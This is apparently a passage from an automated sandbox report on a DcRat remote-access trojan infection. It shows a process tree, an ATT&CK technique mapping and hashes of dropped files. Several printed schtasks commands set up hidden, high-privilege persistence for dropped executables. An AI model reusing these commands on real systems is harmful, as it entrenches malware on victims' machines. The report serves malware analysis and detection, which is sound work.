schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\twain_32\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\twain_32\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\sysmon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\All Users\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3592

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:5008

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:1808

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:3200

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:124

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1108

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:1368

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 672 -ip 672
1⤵
PID:3280

C:\ProgramData\ntckq\omndk.exe
C:\ProgramData\ntckq\omndk.exe
1⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1108 -ip 1108
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3744 -ip 3744
1⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:176

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004DC
1⤵
PID:5536

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b1055 /state1:0x41c64e6d
1⤵
PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Hyperruntimeperf\1BsDc3sv0Ug0mZu.vbe

Filesize
202B

MD5
9eeb18efd6ffdd15ff2e10d8d8a4d969

SHA1
8c8a8f7068e09f226c1608b92dafb6be8c34f499

SHA256
89d58365ef6c2706f361712002535ade91f01be34d5fe2cfe18a4a48275949db

SHA512
90f4b4d308b9656452316f1abed87736eb8861f8a1c6dffacc16d4e479cfd9ed6df47a5138814edf380b555a57efcf6069d7a37abcf925c74254e08efb7f9f82

Download Submit
C:\Hyperruntimeperf\agentServerFont.exe

Filesize
1.1MB

MD5
742ab5f4a773e9107229215a65a859d8

SHA1
1617d7b62397dc6b465dd3db29a10db9d17b8416

SHA256
33f72c942dc0378444c59fc027997fe620b7e918d6d8843b33f70458127d4360

SHA512
8295498c3a4460f21e447fadf684fa302eba81740f94d1c61f0e1908286f691c3ac9c357e9400bff231f746a6f54106fe96b86cf9ab4394dc35e0a36b185ad7b

Download Submit
C:\Hyperruntimeperf\vPQVVqEr.bat

Filesize
153B

MD5
4770d238d473009081d224193b9309a7

SHA1
ea9f7dccdd480af801fe5c817a83b4585acc92af

SHA256
0a6d35eb6486d73bd6c8a35a1b6b16880603003900c3376169e8aa749223b8cd

SHA512
d3c89626acf6e51c822cd9cd71ce7325640d90e2506007a6a50783d979e665de07e5b4a19164cb19aba788bd03576470f90aa5def054c7c937a8d098bc909798

Download Submit
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

Filesize
713KB

MD5
c3192af2dff9319b35ec48b6fe23b0ff

SHA1
3713858569b97f4044caf9f2e0f8ad5b6b2ef713

SHA256
aec05f916b60a80379a0ecde59749ec89beaa0d331e67846f172dbdce858f278

SHA512
dea78632c6e7d4b749982765857de3daab0ecd2a92ae38a7497d5bdfa6d56d7b8a2378a3043455b645526f67fcdebeaff09d5799c410b383e50e44fa46acd0cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\server.exe.log

Filesize
319B

MD5
e7df52bc2fea4cb49c9c749bd9f8d618

SHA1
fd956953e48f15d113f59be5e6a6534d32f2a25a

SHA256
65a906ff066056f5d93198115645da23ab4f880aad5d85f2fab41248b5831373

SHA512
538d0e3958b2b6a2d876e64ed70518aeba857b4effece13c930417754e2df23b612c7368bc4d8344bb9b10b721916d4ff2529cbac86142993170aa1d1918bae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
4764ec833397133003e2e24b080cd7ce

SHA1
03c8926d7afc4e605719aee53ef2ce53f6f314cc

SHA256
88331ffd23c1d6cfef379ab5366333f56ee41ff083f0421915302a492cb2a833

SHA512
e9ad86bc3878f4f3e1a38a191864857f24969e0f11d0636cb76523900e97b06d286c120460c38e7f93039356f45900d32ddda990abffb1958af173dfb1aedac1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
896KB

MD5
bae2c02af754412f344195be99e1cd63

SHA1
77c3d86807cb4fa7bec3b5e4329a395a5593ed42

SHA256
0e19152fd8bc05e7437f803225c65487345d2785276b1f987a36f312faefdebf

SHA512
8d0040243fb1ad2729c80fe07df6fa5f1b2c7705bccf2ddeaaaf890a4d45435a96800289f2c7e493b417cea346a73346d657c68c25b88cb97bf8d23ac957c76d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-11-26.1932.3200.1.odl

Filesize
706B

MD5
3b3ad8f95baac561137be86f3a17ad8e

SHA1
ad8db60131090097be8d98cc8f8e72accc57ab48

SHA256
e4364dc11537bbc8b16e2c7a16c02f7d16a11ab8dfa67531b804044d035ed96f

SHA512
c1d42e77ebc4c0418275bc30e7b458e7f1ec60da8a873828acf692aa17f64a6c5ea8d1b0b6aa44e46cceb9e8f4526cd938a4b0465b9490540aad41fdf4bc318d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8468a637fcae0174fa894ce168332af5

SHA1
b9b66d5514b1b66ca58cd09dfd7e7ec114a61064

SHA256
50ca9b46a543406abaebe8057c05df3e39f63d3fb12c54b03948db88280394b3

SHA512
c0b5ca7b64606a58f79501e1fcc856a6b023f055ee18a80de65513a26714771ad03df87fb36ced84a5298c50cf2f66d944b2c2da50c79573991c816bc7b022f6

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\90c6f203-df41-4895-91c7-a19f61f7971a.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1368212999.exe

Filesize
10KB

MD5
96509ab828867d81c1693b614b22f41d

SHA1
c5f82005dbda43cedd86708cc5fc3635a781a67e

SHA256
a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

SHA512
ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\1648223512.exe

Filesize
20KB

MD5
2473392c0a773aad20da1519aa6f464b

SHA1
2068ffd843bb8c7c7749193f6d1c5f0a9b97b280

SHA256
3d33e8778ea8194d486d42784411e8528c602594abdf3e32cdcee521a10f3ce7

SHA512
5455866f5fc53ae48ff24222b40a264bf673102435abeac2a61ba6fcaa1de429d8f078d4d065cb5d77b96de87f343579651b718e0a60934fb9fa35818d948074

Download Submit
C:\Users\Admin\AppData\Local\Temp\2481835878.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
C:\Users\Admin\AppData\Local\Temp\315457734.exe

Filesize
49KB

MD5
c38ea1b0838858f21ea572f60c69de0c

SHA1
f5e34c47b0630056ba00df97641926f9579b384a

SHA256
cae7ef69cce550af020bfc474c6e035882383b022d63e926c52bd8c3ad1d78e4

SHA512
f9c55f31b9466c412711462322c167aadb72492d70fe5fe89ab5500b86eae8f42de29bc3e469b3f73eab9dd47061b51410d5bee444da0bad719c94c897c59d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\3226925155.exe

Filesize
8KB

MD5
cb8420e681f68db1bad5ed24e7b22114

SHA1
416fc65d538d3622f5ca71c667a11df88a927c31

SHA256
5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

SHA512
baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\484530136.exe

Filesize
11KB

MD5
83a784716728ca579619d0e13a9f17b0

SHA1
5e33ca9dab3c0df2edcd597b8b0da06c88f18f6b

SHA256
9dc0b007f33f768fff2249388428981d89cfcee3e5babd206bbaeb7d5cc34b4f

SHA512
f8218a8e977f0ec340e7139041cfff8bac4cc23bcea0c0c0d7717ead76093d45d10acd72a5846486e9348ce642f529824f1575d0d28b8d2f566c543c7c9d3bc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\975E.tmp\975F.tmp\9760.bat

Filesize
965B

MD5
db5421114f689cfb1c82edf49fddd7a4

SHA1
a1987cfe0b38bdac3fe75bae72137463a0843fac

SHA256
edb8e629e2c5ae4498d0f00cb4540f185cf6136ba11898a542d2fdd34394379a

SHA512
6eaf5f71787046951ffc1fe98c3fdae7dd5a36214cf4971146a94d200bbf2037a8f87e1afa81e05b2d34083d298b0254ac23d2b2e518b6e75fab38e5ca376281

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\000.exe

Filesize
6.7MB

MD5
f2b7074e1543720a9a98fda660e02688

SHA1
1029492c1a12789d8af78d54adcb921e24b9e5ca

SHA256
4ea1f2ecf7eb12896f2cbf8683dae8546d2b8dc43cf7710d68ce99e127c0a966

SHA512
73f9548633bc38bab64b1dd5a01401ef7f5b139163bdf291cc475dbd2613510c4c5e4d7702ecdfa74b49f3c9eaed37ed23b9d8f0064c66123eb0769c8671c6ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

Filesize
208KB

MD5
b61d062e3afc3c602ab315182049304a

SHA1
e9c0fc40cc08c3ffc4f82dc2e1c0b69534117929

SHA256
c4ed0b5825dba0702afec4f537ee55e2292c4dd6a6c5ba77c7e0cc87541ce568

SHA512
a82db1e7cc45d71fc566ed1ddd921ec56de7ff1c8cbf0f693bb83e0b2aa0ef8c28392d6767c60b7205bdadfd295ce76f88d556ee4d8a96f0f7d950f17a1d5bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe

Filesize
1.4MB

MD5
2167dbb528ac2b7b3c6e33f287bd2b8b

SHA1
6172f94bd5407f3c821b66efd236591cb7366712

SHA256
34de8dd822d879b0b1e32d2fb7e1a08757a2803fa610ffe714b2951c7f1e74d8

SHA512
06278125454e2aeaee4b08b9f38a0b1ea23a31e597d3309c371f9421ee63ab9c2bf8f7f0bc099523f740b8b3cb97cea363ee18a72f9d666b1f01d9252740aeea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe

Filesize
7.2MB

MD5
d165b333fe9244a43967bc69c0b686cc

SHA1
58fbba484bdeeb020cc69a78218c897d28f7e2f2

SHA256
01a2bb9f7591986b6eb3388699e7ce4a52b2686295b48dae0ec001639ba9f9b4

SHA512
616556797aaad5deb2d5e8e8a70427d4e0b9ca4f64dd5976cdeaa3c6d8a37a612011e89b120a6ef2e1ef8a50d70483a71d8289a09952f612a9023d5f2922b580

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe

Filesize
11.8MB

MD5
35d0a7832aad0c50eaccdba337def8cc

SHA1
8bd73783e808ddfd50e29aff1b8395ea39853552

SHA256
f2f007107f2d2fffe5328114661c79535b991e6f25fe8cc8e1157dd0b6a2723b

SHA512
f77055a833ba6171088ee551439a7686208f46ccb7377be3f4ed3d8c03304ca61b867e82db4241ea11763f5dfbdda0b9a589de65d1629b1ea6c100b515f29ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\RDX123456.exe

Filesize
327KB

MD5
fba8f56206955304b2a6207d9f5e8032

SHA1
f84cbcc3e34f4d2c8fea97c2562f937e1e20fe28

SHA256
11227ead147b4154c7bd21b75d7f130b498c9ad9b520ca1814c5d6a688c89b1b

SHA512
56e3a0823a7abe08e1c9918d8fa32c574208b462b423ab6bde03345c654b75785fdc3180580c0d55280644b3a9574983e925f2125c2d340cf5e96b98237e99fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Server.exe

Filesize
23KB

MD5
a7a2022d715b3ecb85ea55de936f011b

SHA1
0200512447f2e95d1675b1833d008ea4a7ddaa94

SHA256
d5eaaa22cd69c6ddf1da7b0c8bd0cabbcda679810ed2d95839c08244235fbf81

SHA512
7a0910ef562cb5936ab94fa94dce05eec2d6add7d6c3be3e8ad79a9710bc4fc283aec2d2f20dc6d4b0d641df5a8b1e368e6438f8e04c8f24a61b262d60ce5901

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe

Filesize
90KB

MD5
8af4f985862c71682e796dcc912f27dc

SHA1
7f83117abfeff070d41d8144cf1dfe3af8607d27

SHA256
d925204430ffab51ffbbb9dc90bc224b04f0c2196769850695512245a886be06

SHA512
3d4fcd9755dc4ea005fcd46e78426c5f71b50873c5174a69abcdff41a2e0405c87a36137c0c2409abedadb0ecdf622cbfd2fa1b59a2e06c81cef68d7c6c663b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\beacon.exe

Filesize
7.1MB

MD5
698977a5b343ea381c62f76b91fd54d5

SHA1
a16921db4891aacd3fb7da4124a40e9ea5428fc5

SHA256
d15e35dcb836d038d70b217709261b6a29c1d871c16304368b18ece21b989878

SHA512
52e7d8a45d38c15d6f2bd2065ce8b50b58ccf077b0e5c204bedbb5f0378a34c8eab84375aaabc1eecf28bef72907f9337f479eb2132bced412e0e51477e1d23a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\client.exe

Filesize
1.8MB

MD5
d57c5086ea166bc56e091761a43781ff

SHA1
16b7a96e3c43e82ca962bd94ae1898f796c9cd00

SHA256
dc08aa33da827c3199f3f0345606b97b83bc508239c4c24f02a78d6e996bca09

SHA512
893a1fea55837f2cb7cca1a22ab18795c3fcf91edcdf506c269415b06257d17c8fc426b50a8aa2e4dd34de73cc8fe41711b3276b16499a56714aecd2b98cccda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe

Filesize
396KB

MD5
0f103ba48d169f87b6d066ca88bc03c1

SHA1
c0a175142d2b0793c653be23b83a4df2a0c9fc1c

SHA256
925c5c0d232f0b735e1eb0823890fe8b40c01d93f976a58ec605f36997c25079

SHA512
73a093d14abac8423061e48d07937ffbc8f20d55ca4907573cc015c3b0beaaa7d03f4c2382ab22d1ab5136cc2464dbe5150608054a3eb449cbbd50b278f26884

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\exbuild.exe

Filesize
416KB

MD5
f5d7b79ee6b6da6b50e536030bcc3b59

SHA1
751b555a8eede96d55395290f60adc43b28ba5e2

SHA256
2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

SHA512
532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe

Filesize
898KB

MD5
c02798b26bdaf8e27c1c48ef5de4b2c3

SHA1
bc59ab8827e13d1a9a1892eb4da9cf2d7d62a615

SHA256
af41b9ac95c32686ba1ef373929b54f49088e5c4f295fe828b43b32b5160aa78

SHA512
b541aeedcc4db6f8e0db0788f2791339476a863c15efc72aef3db916fc7c8ab41d84c0546c05b675be4d7700c4f986dbae5e2858d60ecd44b4ffbcae2065cfc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\kill.exe

Filesize
13KB

MD5
789f1016740449ce3e9a7fe210383460

SHA1
e0905d363448178d485ed15ee6f67b0f1d72e728

SHA256
71068065d8dd7daa9c49687b973d05d5602ed994467728763d2213fe4d90c0d8

SHA512
b63467a55f11f8e3e6dfee195e5a64d7dec621834e1c26e1f64210496dbad36409771968a5e3b2f142fb6196df5689c012f5971ca2fd4bb3b1311f8f66f2f2fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe

Filesize
943KB

MD5
96e4917ea5d59eca7dd21ad7e7a03d07

SHA1
28c721effb773fdd5cb2146457c10b081a9a4047

SHA256
cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957

SHA512
3414450d1a200ffdcc6e3cb477a0a11049e5e86e8d15ae5b8ed3740a52a0226774333492279092134364460b565a25a7967b987f2304355ecfd5825f86e61687

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\pyl64.exe

Filesize
2.5MB

MD5
d07b3c00866cb1bba2cf2007161f84af

SHA1
f0215fdb9c97bd752489dd1601a4253494beafcb

SHA256
d2662051702168049d751c1b90cfef9f1e34a04a6c7689db3c79a2547a7339ba

SHA512
1d98b1d01e897caf715f877672cf256a25a3c3318af898df046cc011830376f558a65c0f5e308d0922f66634f24cced3999a7bb6cbffa9d8cd3091f27436f76f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe

Filesize
325KB

MD5
fb3217dd8cddb17b78a30cf4d09681fc

SHA1
e4c4f4c1812927b176b58660d2edba75d103a76a

SHA256
12938790f91b2612b7c6a1fd4aa16219a7d2469731e27d4bbd409ad438e64669

SHA512
4e37b8c6638c8c203fc2163be6014827a8c690506f50a8ec87022f7f5a74645f2c5bbcdfd7e0e75ec67775bc81887d6b094f08778c1f90c3909d46c8432344f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\random.exe

Filesize
900KB

MD5
19fcdf56ae709a03be8137ad630d1c9b

SHA1
e3f487ed3ab79fc05b892db548da9aa14cd69171

SHA256
73f94f70d57668c306dc97607d38353817bee05d8c220db436ed3c610cfa6ca2

SHA512
da5645416691df32c29851f1f933e60082874145b99d62dd92294fe893e1bf4a67b1926c5b73a69ab10c976a59e019dd6787fe75973c72e464f083bec1522c13

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe

Filesize
186KB

MD5
2dcfbac83be168372e01d4bd4ec6010c

SHA1
5f0cf3f5be05b478dec3a55b7e1757ca7c1a7fd3

SHA256
68fbb7d4c5af27b3941f4db758e2007decdd35849ab025a9e06d2ad4718b8b63

SHA512
a5acad6b7f97472367f59e85e8d61e7bbf25d6a1fc9054910780593440a2345d9ec8bb22a7f41b5b8f85eacbab9f8971dbe31c11c4c887647f86140f98e5a143

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\st.exe

Filesize
24KB

MD5
2b44517f043bad938ec1b583a6b844d6

SHA1
bd1683b447cd88d5161bcd446a9ae43794b3da63

SHA256
54789a9f7db7e8d3688be22d062dc7508ea7dc180320b2b7d05dc11d0c49862a

SHA512
d35c5058265a6deb00baf079bd5d54e6a95712c420b30359d274fe0b8a360c17fe9d65c78ffa08bfb997f63c62248e51baae93caeae5349c28057907ff86a949

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\systems.exe

Filesize
471KB

MD5
454a942056f6d69c4a06ffedffea974a

SHA1
2dc40e77a9fb2822a8d11ad1c30715bd2974ae99

SHA256
2b9de0299a80e370e454b8512ee65abf2eac12ab3fe681201c25745978b199ed

SHA512
c8dca985cc32ae5f6a4fa53b93c3fa0a639437e7b41e5b905a306e316968daef2dc380a8518e4af56f527f4b8d212a29e4b806bb5e39bd15a7e13de122084951

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\tdrp.exe

Filesize
10KB

MD5
b303085cc927648616a090461af7c93e

SHA1
dc78812c3a27184346ee5fc783aca3dba5558469

SHA256
02b5e6fb84a77ee243f648f0ab29835be6463c4a96512972f825c146b67624f0

SHA512
bba260bf3753337a72091fd4c738829ee7c78d2093fd42bea04f383cc6c10ba639980fddaa93aea04282097aa44c9cf4da8f278aa3040ecd620645c39325296b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\test18.exe

Filesize
354KB

MD5
a694c5303aa1ce8654670ff61ffda800

SHA1
0dbc8ebd8b9dd827114203c3855db80cf40e57c0

SHA256
994d0670d75433df8e0f2cce833d19d3045d3527143ce2ccf4cb4c04d4157a62

SHA512
b15856b54a018a71e71637e47e00b1c64154e24ae4c2a671dca25c43bccf4bbbf9da4445b6a7d48f62cab7da06c30fdd884d4bba21c5929a9569db0a288d9d9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
37B

MD5
28151380c82f5de81c1323171201e013

SHA1
ae515d813ba2b17c8c5ebdae196663dc81c26d3c

SHA256
bb8582ce28db923f243c8d7a3f2eccb0ed25930f5b5c94133af8eefb57a8231d

SHA512
46b29cba0dc813de0c58d2d83dc298fa677921fd1f19f41e2ed3c7909c497fab2236d10a9ae59b3f38e49cf167964ede45e15543673a1e0843266242b8e26253

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe

Filesize
16KB

MD5
e7d405eec8052898f4d2b0440a6b72c9

SHA1
58cf7bfcec81faf744682f9479b905feed8e6e68

SHA256
b63a0e5f93b26ad0eeb9efba66691f3b7e7f51e93a2f0098bde43833f7a24cc2

SHA512
324507084bd56f7102459efe7b3c2d2560f4e89ed03ec4a38539ebb71bccdf1def7bc961c259f9b02f4b2be0d5e095136c9efcd5fc3108af3dc61d24970d6121

Download Submit
C:\Users\Admin\AppData\Local\Temp\UHocbg4ojv.bat

Filesize
197B

MD5
22bc77601a04e459746871720583ecf8

SHA1
d80a1f3ac20ff47e8108b52552e2f53c0c50c173

SHA256
ca159666ea76c807ed0bfeb34e651c1e5a46b54918735a06fdd918fcff663281

SHA512
a51c595d5e96f9a7474dd7fcf94f889ddcbf23cc71ea6f32e2a9c948d789ecfe8bea0d79c0c84a62dde9bd203b2a0aebad8a93b3d53b587bdc358b0280c4db11

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jealtp35.uzr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Local\Temp\v.mp4

Filesize
81KB

MD5
d2774b188ab5dde3e2df5033a676a0b4

SHA1
6e8f668cba211f1c3303e4947676f2fc9e4a1bcc

SHA256
95374cf300097872a546d89306374e7cf2676f7a8b4c70274245d2dccfc79443

SHA512
